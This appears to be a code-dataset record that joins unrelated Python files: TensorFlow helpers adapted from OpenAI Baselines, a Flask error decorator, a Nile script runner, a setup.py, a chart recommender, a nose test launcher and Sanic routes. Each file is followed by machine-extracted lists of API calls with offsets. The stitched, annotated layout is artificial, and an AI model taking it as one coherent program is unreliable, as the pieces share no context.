'fairlearn.metrics.group_mean_squared_error', 'metrics.group_mean_squared_error', (['y_t', 'y_p', 'groups'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, groups, multioutput='raw_values')\n", (8350, 8394), True, 'import fairlearn.metrics as metrics\n'), ((8419, 8477), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (['y_t', 'y_p'], {'multioutput': '"""raw_values"""'}), "(y_t, y_p, multioutput='raw_values')\n", (8441, 8477), True, 'import sklearn.metrics as skm\n'), ((8490, 8538), 'numpy.array_equal', 'np.array_equal', (['result.overall', 'expected_overall'], {}), '(result.overall, expected_overall)\n', (8504, 8538), True, 'import numpy as np\n'), ((8564, 8581), 'numpy.unique', 'np.unique', (['groups'], {}), '(groups)\n', (8573, 8581), True, 'import numpy as np\n'), ((2784, 2832), 'numpy.array_equal', 'np.array_equal', (['expected_overall', 'result.overall'], {}), '(expected_overall, result.overall)\n', (2798, 2832), True, 'import numpy as np\n'), ((3330, 3378), 'numpy.array_equal', 'np.array_equal', (['expected_overall', 'result.overall'], {}), '(expected_overall, result.overall)\n', (3344, 3378), True, 'import numpy as np\n'), ((3909, 3957), 'numpy.array_equal', 'np.array_equal', (['expected_overall', 'result.overall'], {}), '(expected_overall, result.overall)\n', (3923, 3957), True, 'import numpy as np\n'), ((7920, 7980), 'sklearn.metrics.r2_score', 'skm.r2_score', (['y_t[mask]', 'y_p[mask]'], {'multioutput': '"""raw_values"""'}), "(y_t[mask], y_p[mask], multioutput='raw_values')\n", (7932, 7980), True, 'import sklearn.metrics as skm\n'), ((7996, 8051), 'numpy.array_equal', 'np.array_equal', (['result.by_group[target_group]', 'expected'], {}), '(result.by_group[target_group], expected)\n', (8010, 8051), True, 'import numpy as np\n'), ((8224, 8241), 'numpy.random.rand', 'np.random.rand', (['(2)'], {}), '(2)\n', (8238, 8241), True, 'import numpy as np\n'), ((8270, 8287), 'numpy.random.rand', 'np.random.rand', (['(2)'], {}), '(2)\n', (8284, 8287), True, 'import numpy as np\n'), ((8797, 8861), 'sklearn.metrics.mean_squared_error', 'skm.mean_squared_error', (['y_true', 'y_pred'], {'multioutput': '"""raw_values"""'}), "(y_true, y_pred, multioutput='raw_values')\n", (8819, 8861), True, 'import sklearn.metrics as skm\n'), ((8877, 8932), 'numpy.array_equal', 'np.array_equal', (['result.by_group[target_group]', 'expected'], {}), '(result.by_group[target_group], expected)\n', (8891, 8932), True, 'import numpy as np\n'), ((7866, 7884), 'numpy.asarray', 'np.asarray', (['groups'], {}), '(groups)\n', (7876, 7884), True, 'import numpy as np\n')] |
"""
Adapted from OpenAI Baselines.
"""
import numpy as np
import tensorflow as tf # pylint: ignore-module
import random
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def make_session(num_cpu=None, make_default=False):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
tf_config.gpu_options.allocator_type = 'BFC'
if make_default:
return tf.InteractiveSession(config=tf_config)
else:
return tf.Session(config=tf_config)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
tf.get_default_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Saving variables and setting up experiment directories
# ================================================================
def load_state(fname):
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname):
os.makedirs(os.path.dirname(fname), exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
def load(fname):
import cloudpickle
with open(fname, 'rb') as f:
return cloudpickle.load(f)
def save(fname, obj):
import cloudpickle
os.makedirs(os.path.dirname(fname), exist_ok=True)
with open(fname, 'wb') as fh:
cloudpickle.dump(obj, fh)
class Experiment(object):
def __init__(self, logdir):
self.logdir = logdir
os.makedirs(os.path.join(logdir, 'checkpoints'), exist_ok=True)
def load(self, timestep=None):
if timestep is None:
# get latest ckpt
import glob
fs = glob.glob(os.path.join(self.logdir, 'checkpoints/*'))
timesteps = []
for f in fs:
try: timesteps.append(int(os.path.basename(f)))
except: pass
if len(timesteps) == 0:
return 0
timestep = max(timesteps)
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
load_state(fname)
return timestep
def save(self, timestep):
fname = os.path.join(self.logdir, 'checkpoints', str(timestep), 'model')
save_state(fname)
def load_model_fn(self):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
assert os.path.exists(fname), "No model file saved."
return load(fname)
def save_model_fn(self, model_fn):
fname = os.path.join(self.logdir, 'checkpoints/model_fn.pkl')
save(fname, model_fn)
# ================================================================
# Model components
# ================================================================
def batch_to_seq(h, nbatch, nsteps, flat=False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
h = x.reshape([-1, *x.shape[2:]]))
"""
if flat:
h = tf.reshape(h, [nsteps, nbatch])
else:
h = tf.reshape(h, [nsteps, nbatch, -1])
return [tf.squeeze(v, [0]) for v in tf.split(axis=0, num_or_size_splits=nsteps, value=h)]
def seq_to_batch(h, flat = False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
x = output.reshape(nsteps, nbatch, *obs_shape), where output is the output of this function.
"""
shape = h[0].get_shape().as_list()
if not flat:
assert(len(shape) > 1)
nh = h[0].get_shape()[-1].value
return tf.reshape(tf.concat(axis=0, values=h), [-1, nh])
else:
return tf.reshape(tf.stack(values=h, axis=0), [-1])
def ortho_init(scale=1.0):
def _ortho_init(shape, dtype, partition_info=None):
#lasagne ortho init for tf
shape = tuple(shape)
if len(shape) == 2:
flat_shape = shape
elif len(shape) == 4: # assumes NHWC
flat_shape = (np.prod(shape[:-1]), shape[-1])
else:
raise NotImplementedError
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return (scale * q[:shape[0], :shape[1]]).astype(np.float32)
return _ortho_init
def normc_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def lstm(xs, ms, s, scope, nh, init_scale=1.0):
nbatch, nin = [v.value for v in xs[0].get_shape()]
nsteps = len(xs)
with tf.variable_scope(scope):
wx = tf.get_variable("wx", [nin, nh*4], initializer=ortho_init(init_scale))
wh = tf.get_variable("wh", [nh, nh*4], initializer=ortho_init(init_scale))
b = tf.get_variable("b", [nh*4], initializer=tf.constant_initializer(0.0))
c, h = tf.split(axis=1, num_or_size_splits=2, value=s)
for idx, (x, m) in enumerate(zip(xs, ms)):
c = c*(1-m)
h = h*(1-m)
z = tf.matmul(x, wx) + tf.matmul(h, wh) + b
i, f, o, u = tf.split(axis=1, num_or_size_splits=4, value=z)
i = tf.nn.sigmoid(i)
f = tf.nn.sigmoid(f)
o = tf.nn.sigmoid(o)
u = tf.tanh(u)
c = f*c + i*u
h = o*tf.tanh(c)
xs[idx] = h
s = tf.concat(axis=1, values=[c, h])
return xs, s
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
# for inpt in inputs:
# if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
# assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = value
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
if value is not None:
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])
results = tf.get_default_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads, _ = tf.clip_by_global_norm(grads, clip_norm=clip_norm)
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
def reset():
global ALREADY_INITIALIZED
ALREADY_INITIALIZED = set()
tf.reset_default_graph()
"""
Random Seeds
"""
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
| [
"numpy.prod",
"tensorflow.tanh",
"tensorflow.split",
"tensorflow.get_default_session",
"multiprocessing.cpu_count",
"tensorflow.gradients",
"tensorflow.group",
"tensorflow.cast",
"tensorflow.variables_initializer",
"tensorflow.set_random_seed",
"tensorflow.clip_by_global_norm",
"cloudpickle.load",
"os.path.exists",
"tensorflow.Session",
"tensorflow.placeholder",
"functools.wraps",
"tensorflow.concat",
"tensorflow.nn.sigmoid",
"numpy.random.seed",
"tensorflow.matmul",
"tensorflow.square",
"tensorflow.zeros_like",
"tensorflow.ConfigProto",
"tensorflow.stack",
"numpy.random.normal",
"tensorflow.InteractiveSession",
"tensorflow.variable_scope",
"tensorflow.global_variables",
"numpy.square",
"os.path.dirname",
"cloudpickle.dump",
"tensorflow.reshape",
"numpy.linalg.svd",
"numpy.random.randn",
"tensorflow.reset_default_graph",
"tensorflow.train.Saver",
"os.path.join",
"random.seed",
"tensorflow.constant",
"tensorflow.constant_initializer",
"os.path.basename",
"tensorflow.squeeze",
"tensorflow.abs"
]
| [((1837, 1931), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'inter_op_parallelism_threads': 'num_cpu', 'intra_op_parallelism_threads': 'num_cpu'}), '(inter_op_parallelism_threads=num_cpu,\n intra_op_parallelism_threads=num_cpu)\n', (1851, 1931), True, 'import tensorflow as tf\n'), ((2277, 2295), 'functools.wraps', 'functools.wraps', (['f'], {}), '(f)\n', (2292, 2295), False, 'import functools\n'), ((2946, 2962), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (2960, 2962), True, 'import tensorflow as tf\n'), ((3105, 3121), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (3119, 3121), True, 'import tensorflow as tf\n'), ((7065, 7112), 'tensorflow.split', 'tf.split', ([], {'axis': '(1)', 'num_or_size_splits': '(2)', 'value': 's'}), '(axis=1, num_or_size_splits=2, value=s)\n', (7073, 7112), True, 'import tensorflow as tf\n'), ((7506, 7538), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(1)', 'values': '[c, h]'}), '(axis=1, values=[c, h])\n', (7515, 7538), True, 'import tensorflow as tf\n'), ((11241, 11269), 'tensorflow.gradients', 'tf.gradients', (['loss', 'var_list'], {}), '(loss, var_list)\n', (11253, 11269), True, 'import tensorflow as tf\n'), ((12602, 12626), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (12624, 12626), True, 'import tensorflow as tf\n'), ((12796, 12813), 'numpy.random.seed', 'np.random.seed', (['i'], {}), '(i)\n', (12810, 12813), True, 'import numpy as np\n'), ((12818, 12832), 'random.seed', 'random.seed', (['i'], {}), '(i)\n', (12829, 12832), False, 'import random\n'), ((676, 702), 'tensorflow.cast', 'tf.cast', (['condition', '"""bool"""'], {}), "(condition, 'bool')\n", (683, 702), True, 'import tensorflow as tf\n'), ((2030, 2069), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {'config': 'tf_config'}), '(config=tf_config)\n', (2051, 2069), True, 'import tensorflow as tf\n'), ((2095, 2123), 'tensorflow.Session', 'tf.Session', ([], {'config': 'tf_config'}), '(config=tf_config)\n', (2105, 2123), True, 'import tensorflow as tf\n'), ((2631, 2670), 'tensorflow.variables_initializer', 'tf.variables_initializer', (['new_variables'], {}), '(new_variables)\n', (2655, 2670), True, 'import tensorflow as tf\n'), ((2981, 3005), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (3003, 3005), True, 'import tensorflow as tf\n'), ((3054, 3076), 'os.path.dirname', 'os.path.dirname', (['fname'], {}), '(fname)\n', (3069, 3076), False, 'import os\n'), ((3137, 3161), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (3159, 3161), True, 'import tensorflow as tf\n'), ((3259, 3278), 'cloudpickle.load', 'cloudpickle.load', (['f'], {}), '(f)\n', (3275, 3278), False, 'import cloudpickle\n'), ((3341, 3363), 'os.path.dirname', 'os.path.dirname', (['fname'], {}), '(fname)\n', (3356, 3363), False, 'import os\n'), ((3422, 3447), 'cloudpickle.dump', 'cloudpickle.dump', (['obj', 'fh'], {}), '(obj, fh)\n', (3438, 3447), False, 'import cloudpickle\n'), ((4357, 4410), 'os.path.join', 'os.path.join', (['self.logdir', '"""checkpoints/model_fn.pkl"""'], {}), "(self.logdir, 'checkpoints/model_fn.pkl')\n", (4369, 4410), False, 'import os\n'), ((4426, 4447), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (4440, 4447), False, 'import os\n'), ((4555, 4608), 'os.path.join', 'os.path.join', (['self.logdir', '"""checkpoints/model_fn.pkl"""'], {}), "(self.logdir, 'checkpoints/model_fn.pkl')\n", (4567, 4608), False, 'import os\n'), ((4997, 5028), 'tensorflow.reshape', 'tf.reshape', (['h', '[nsteps, nbatch]'], {}), '(h, [nsteps, nbatch])\n', (5007, 5028), True, 'import tensorflow as tf\n'), ((5051, 5086), 'tensorflow.reshape', 'tf.reshape', (['h', '[nsteps, nbatch, -1]'], {}), '(h, [nsteps, nbatch, -1])\n', (5061, 5086), True, 'import tensorflow as tf\n'), ((5099, 5117), 'tensorflow.squeeze', 'tf.squeeze', (['v', '[0]'], {}), '(v, [0])\n', (5109, 5117), True, 'import tensorflow as tf\n'), ((6039, 6077), 'numpy.random.normal', 'np.random.normal', (['(0.0)', '(1.0)', 'flat_shape'], {}), '(0.0, 1.0, flat_shape)\n', (6055, 6077), True, 'import numpy as np\n'), ((6096, 6133), 'numpy.linalg.svd', 'np.linalg.svd', (['a'], {'full_matrices': '(False)'}), '(a, full_matrices=False)\n', (6109, 6133), True, 'import numpy as np\n'), ((6602, 6618), 'tensorflow.constant', 'tf.constant', (['out'], {}), '(out)\n', (6613, 6618), True, 'import tensorflow as tf\n'), ((6777, 6801), 'tensorflow.variable_scope', 'tf.variable_scope', (['scope'], {}), '(scope)\n', (6794, 6801), True, 'import tensorflow as tf\n'), ((7273, 7320), 'tensorflow.split', 'tf.split', ([], {'axis': '(1)', 'num_or_size_splits': '(4)', 'value': 'z'}), '(axis=1, num_or_size_splits=4, value=z)\n', (7281, 7320), True, 'import tensorflow as tf\n'), ((7333, 7349), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['i'], {}), '(i)\n', (7346, 7349), True, 'import tensorflow as tf\n'), ((7362, 7378), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['f'], {}), '(f)\n', (7375, 7378), True, 'import tensorflow as tf\n'), ((7391, 7407), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['o'], {}), '(o)\n', (7404, 7407), True, 'import tensorflow as tf\n'), ((7420, 7430), 'tensorflow.tanh', 'tf.tanh', (['u'], {}), '(u)\n', (7427, 7430), True, 'import tensorflow as tf\n'), ((9861, 9879), 'tensorflow.group', 'tf.group', (['*updates'], {}), '(*updates)\n', (9869, 9879), True, 'import tensorflow as tf\n'), ((11170, 11180), 'numpy.prod', 'np.prod', (['x'], {}), '(x)\n', (11177, 11180), True, 'import numpy as np\n'), ((11319, 11369), 'tensorflow.clip_by_global_norm', 'tf.clip_by_global_norm', (['grads'], {'clip_norm': 'clip_norm'}), '(grads, clip_norm=clip_norm)\n', (11341, 11369), True, 'import tensorflow as tf\n'), ((11785, 11820), 'tensorflow.placeholder', 'tf.placeholder', (['dtype', '[total_size]'], {}), '(dtype, [total_size])\n', (11799, 11820), True, 'import tensorflow as tf\n'), ((12074, 12092), 'tensorflow.group', 'tf.group', (['*assigns'], {}), '(*assigns)\n', (12082, 12092), True, 'import tensorflow as tf\n'), ((12770, 12791), 'tensorflow.set_random_seed', 'tf.set_random_seed', (['i'], {}), '(i)\n', (12788, 12791), True, 'import tensorflow as tf\n'), ((1355, 1364), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (1361, 1364), True, 'import tensorflow as tf\n'), ((1382, 1394), 'tensorflow.square', 'tf.square', (['x'], {}), '(x)\n', (1391, 1394), True, 'import tensorflow as tf\n'), ((2343, 2355), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (2353, 2355), True, 'import tensorflow as tf\n'), ((2553, 2574), 'tensorflow.global_variables', 'tf.global_variables', ([], {}), '()\n', (2572, 2574), True, 'import tensorflow as tf\n'), ((2602, 2626), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (2624, 2626), True, 'import tensorflow as tf\n'), ((3556, 3591), 'os.path.join', 'os.path.join', (['logdir', '"""checkpoints"""'], {}), "(logdir, 'checkpoints')\n", (3568, 3591), False, 'import os\n'), ((5127, 5179), 'tensorflow.split', 'tf.split', ([], {'axis': '(0)', 'num_or_size_splits': 'nsteps', 'value': 'h'}), '(axis=0, num_or_size_splits=nsteps, value=h)\n', (5135, 5179), True, 'import tensorflow as tf\n'), ((5556, 5583), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(0)', 'values': 'h'}), '(axis=0, values=h)\n', (5565, 5583), True, 'import tensorflow as tf\n'), ((5631, 5657), 'tensorflow.stack', 'tf.stack', ([], {'values': 'h', 'axis': '(0)'}), '(values=h, axis=0)\n', (5639, 5657), True, 'import tensorflow as tf\n'), ((7467, 7477), 'tensorflow.tanh', 'tf.tanh', (['c'], {}), '(c)\n', (7474, 7477), True, 'import tensorflow as tf\n'), ((1419, 1428), 'tensorflow.abs', 'tf.abs', (['x'], {}), '(x)\n', (1425, 1428), True, 'import tensorflow as tf\n'), ((1791, 1818), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (1816, 1818), False, 'import multiprocessing\n'), ((3754, 3796), 'os.path.join', 'os.path.join', (['self.logdir', '"""checkpoints/*"""'], {}), "(self.logdir, 'checkpoints/*')\n", (3766, 3796), False, 'import os\n'), ((6472, 6495), 'numpy.random.randn', 'np.random.randn', (['*shape'], {}), '(*shape)\n', (6487, 6495), True, 'import numpy as np\n'), ((7023, 7051), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['(0.0)'], {}), '(0.0)\n', (7046, 7051), True, 'import tensorflow as tf\n'), ((7212, 7228), 'tensorflow.matmul', 'tf.matmul', (['x', 'wx'], {}), '(x, wx)\n', (7221, 7228), True, 'import tensorflow as tf\n'), ((7231, 7247), 'tensorflow.matmul', 'tf.matmul', (['h', 'wh'], {}), '(h, wh)\n', (7240, 7247), True, 'import tensorflow as tf\n'), ((12133, 12157), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (12155, 12157), True, 'import tensorflow as tf\n'), ((12390, 12414), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (12412, 12414), True, 'import tensorflow as tf\n'), ((5943, 5962), 'numpy.prod', 'np.prod', (['shape[:-1]'], {}), '(shape[:-1])\n', (5950, 5962), True, 'import numpy as np\n'), ((10663, 10687), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (10685, 10687), True, 'import tensorflow as tf\n'), ((11983, 12027), 'tensorflow.reshape', 'tf.reshape', (['theta[start:start + size]', 'shape'], {}), '(theta[start:start + size], shape)\n', (11993, 12027), True, 'import tensorflow as tf\n'), ((6544, 6558), 'numpy.square', 'np.square', (['out'], {}), '(out)\n', (6553, 6558), True, 'import numpy as np\n'), ((11457, 11473), 'tensorflow.zeros_like', 'tf.zeros_like', (['v'], {}), '(v)\n', (11470, 11473), True, 'import tensorflow as tf\n'), ((3892, 3911), 'os.path.basename', 'os.path.basename', (['f'], {}), '(f)\n', (3908, 3911), False, 'import os\n')] |
from functools import wraps
from werkzeug.exceptions import HTTPException
from api.exceptions import MessageNotFound
def api_error_handler(func):
@wraps(func)
def handle_errors(*args, **kwargs):
try:
return func(*args, **kwargs)
except MessageNotFound as e:
return e.message, 404
except HTTPException:
raise
except Exception:
return "API Internal error", 500
return handle_errors
| [
"functools.wraps"
]
| [((153, 164), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (158, 164), False, 'from functools import wraps\n')] |
"""Command to run Nile scripts."""
import logging
from importlib.machinery import SourceFileLoader
from nile.nre import NileRuntimeEnvironment
def run(path, network):
"""Run nile scripts passing on the NRE object."""
logger = logging.getLogger()
logger.disabled = True
script = SourceFileLoader("script", path).load_module()
nre = NileRuntimeEnvironment(network)
script.run(nre)
| [
"logging.getLogger",
"importlib.machinery.SourceFileLoader",
"nile.nre.NileRuntimeEnvironment"
]
| [((237, 256), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (254, 256), False, 'import logging\n'), ((354, 385), 'nile.nre.NileRuntimeEnvironment', 'NileRuntimeEnvironment', (['network'], {}), '(network)\n', (376, 385), False, 'from nile.nre import NileRuntimeEnvironment\n'), ((297, 329), 'importlib.machinery.SourceFileLoader', 'SourceFileLoader', (['"""script"""', 'path'], {}), "('script', path)\n", (313, 329), False, 'from importlib.machinery import SourceFileLoader\n')] |
#!/usr/bin/env python
import setuptools
from setuptools import setup
from os import path
# Read the package requirements
with open("requirements.txt", "r") as f:
requirements = [line.rstrip("\n") for line in f if line != "\n"]
# Read the contents of the README file
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(name='access-spotify',
version="1.1",
author="pancham_banerjee",
author_email="<EMAIL>",
packages=setuptools.find_packages(),
scripts=["./bin/access_script.py"],
install_requires=requirements,
license="MIT",
description="A package to get all album and track info for an artist by querying the Spotify API",
long_description=long_description,
long_description_content_type='text/markdown'
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
]
| [((303, 325), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (315, 325), False, 'from os import path\n'), ((337, 375), 'os.path.join', 'path.join', (['this_directory', '"""README.md"""'], {}), "(this_directory, 'README.md')\n", (346, 375), False, 'from os import path\n'), ((562, 588), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (586, 588), False, 'import setuptools\n')] |
import os
import pandas as pd
class LiveProjectPopularityBasedRecs:
def __init__(self):
self.charts = {}
charts_folder = "charts"
if os.path.isdir(charts_folder):
for file in os.listdir("charts"):
name, ext = file.split('.')
if ext == "csv" and len(name) > 0:
self.charts[name] = pd.read_csv("{}/{}".format(charts_folder, file), index_col=0)
else:
print("Genre Global and Charts not implemented!")
def genre_chart(self, genre):
if genre in self.charts:
return self.charts[genre]
elif "Top" in self.charts:
return self.charts["Top"]
else:
return ""
| [
"os.listdir",
"os.path.isdir"
]
| [((165, 193), 'os.path.isdir', 'os.path.isdir', (['charts_folder'], {}), '(charts_folder)\n', (178, 193), False, 'import os\n'), ((220, 240), 'os.listdir', 'os.listdir', (['"""charts"""'], {}), "('charts')\n", (230, 240), False, 'import os\n')] |
#!../env/bin/python
"""A simple test script for the PCE portion of OnRamp.
Usage: ./test_pce.py
This script is only intended to be run in a fresh install of the repository. It
has side-effects that could corrupt module and user data if run in a production
setting.
Prior to running this script, ensure that onramp/pce/bin/onramp_pce_install.py
has been called and that the server is running. Also Ensure
./test_pce_config.cfg contains the proper settings.
"""
import nose
import sys
if __name__ == '__main__':
print (__doc__)
response = raw_input('(C)ontinue or (A)bort? ')
if response != 'C':
sys.exit(0)
nose.main()
| [
"nose.main",
"sys.exit"
]
| [((635, 646), 'nose.main', 'nose.main', ([], {}), '()\n', (644, 646), False, 'import nose\n'), ((618, 629), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (626, 629), False, 'import sys\n')] |
from sanic import Blueprint
from sanic_transmute import add_route
from .views import (
get_all,
get_status_by_country_id,
get_status_by_country_name,
get_deaths,
get_active_cases,
get_recovered_cases,
get_confirmed_cases,
list_countries,
)
cases = Blueprint("cases", url_prefix="/cases")
add_route(cases, get_all)
add_route(cases, get_status_by_country_id)
add_route(cases, get_status_by_country_name)
add_route(cases, get_deaths)
add_route(cases, get_active_cases)
add_route(cases, get_recovered_cases)
add_route(cases, get_confirmed_cases)
add_route(cases, list_countries)
| [
"sanic.Blueprint",
"sanic_transmute.add_route"
]
| [((281, 320), 'sanic.Blueprint', 'Blueprint', (['"""cases"""'], {'url_prefix': '"""/cases"""'}), "('cases', url_prefix='/cases')\n", (290, 320), False, 'from sanic import Blueprint\n'), ((321, 346), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_all'], {}), '(cases, get_all)\n', (330, 346), False, 'from sanic_transmute import add_route\n'), ((347, 389), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_status_by_country_id'], {}), '(cases, get_status_by_country_id)\n', (356, 389), False, 'from sanic_transmute import add_route\n'), ((390, 434), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_status_by_country_name'], {}), '(cases, get_status_by_country_name)\n', (399, 434), False, 'from sanic_transmute import add_route\n'), ((435, 463), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_deaths'], {}), '(cases, get_deaths)\n', (444, 463), False, 'from sanic_transmute import add_route\n'), ((464, 498), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_active_cases'], {}), '(cases, get_active_cases)\n', (473, 498), False, 'from sanic_transmute import add_route\n'), ((499, 536), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_recovered_cases'], {}), '(cases, get_recovered_cases)\n', (508, 536), False, 'from sanic_transmute import add_route\n'), ((537, 574), 'sanic_transmute.add_route', 'add_route', (['cases', 'get_confirmed_cases'], {}), '(cases, get_confirmed_cases)\n', (546, 574), False, 'from sanic_transmute import add_route\n'), ((575, 607), 'sanic_transmute.add_route', 'add_route', (['cases', 'list_countries'], {}), '(cases, list_countries)\n', (584, 607), False, 'from 